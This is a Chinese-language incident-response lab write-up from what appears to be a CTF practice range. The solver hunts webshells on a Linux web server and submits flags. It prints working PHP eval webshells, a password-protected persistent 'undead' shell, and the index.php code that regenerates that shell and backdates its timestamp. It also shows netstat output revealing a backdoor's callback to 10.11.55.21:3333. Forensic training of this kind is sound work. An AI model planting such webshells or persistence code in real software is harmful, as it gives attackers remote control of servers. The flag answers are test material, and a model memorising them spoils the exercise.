第一章应急响应- Linux入侵排查 - 第一章 - 应急响应 - 玄机 - 靶场练习

# 题目 1

web 目录存在木马，请找到木马的密码提交

html 打包下载，火绒直接查杀了三个 shell 文件出来。

	root@ip-10-0-10-1:/var/www/html# cat 1.php
	<?php eval($_POST[1]);?>

flag： flag{1}

服务器疑似存在不死马，请找到不死马的密码提交

	root@ip-10-0-10-1:/var/www/html# cat .shell.php
	<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

解密得到 hello

flag： flag{hello}

不死马是通过哪个文件生成的，请提交文件名

index.php 是源头。

	<?php
	include('config.php');
	include(SYS_ROOT.INC.'common.php');
	$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
	if(substr($path, 0,1)=='/'){
	$path=substr($path,1);
	}
	$path = Base::safeword($path);
	$ctrl=isset($_GET['action'])?$_GET['action']:'run';
	if(isset($_GET['createprocess']))
	{
	Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
	}else{
	Index::run($path);
	}
	$file = '/var/www/html/.shell.php';
	$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
	file_put_contents($file, $code);
	system('touch -m -d "2021-01-01 00:00:01" .shell.php');
	usleep(3000);
	?>

黑客留下了木马文件，请找出黑客的服务器 ip 提交

	root@ip-10-0-10-1:/var/www/html# ./shell$1$.elf &
	[1] 1149
	root@ip-10-0-10-1:/var/www/html# netstat -antlp
	Active Internet connections (servers and established)
	Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
	tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 480/sshd
	tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 556/mysqld
	tcp 0 356 10.0.10.1:22 60.1.166.23:5412 ESTABLISHED 754/sshd: root@pts/
	tcp 0 1 10.0.10.1:48534 10.11.55.21:3333 SYN_SENT 1149/./shell(1).elf
	tcp6 0 0 :::22 :::* LISTEN 480/sshd
	tcp6 0 0 :::80 :::* LISTEN 550/apache2

flag： flag{10.11.55.21}

黑客留下了木马文件，请找出黑客服务器开启的监端口提交

同上

flag： flag{3333}